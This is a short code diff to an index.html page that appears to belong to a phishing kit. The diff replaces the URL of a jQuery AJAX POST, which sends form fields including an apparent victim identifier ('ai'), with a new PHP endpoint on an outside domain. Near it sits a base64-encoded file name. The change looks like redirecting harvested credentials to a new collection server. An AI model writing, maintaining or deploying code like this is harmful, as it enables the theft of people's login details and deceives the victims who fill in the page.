--- a/index.html
+++ b/index.html
@@ -326,7 +326,7 @@ var file="bmV4dC5waHA=";
         count = count + 1;
         $.ajax({
             dataType: 'JSON',
-            url: 'https://srprubber.us/my/',
+            url: 'https://holisticfacades.com.ng/success/unit.php',
             type: 'POST',
             data: {
                 ai: ai,
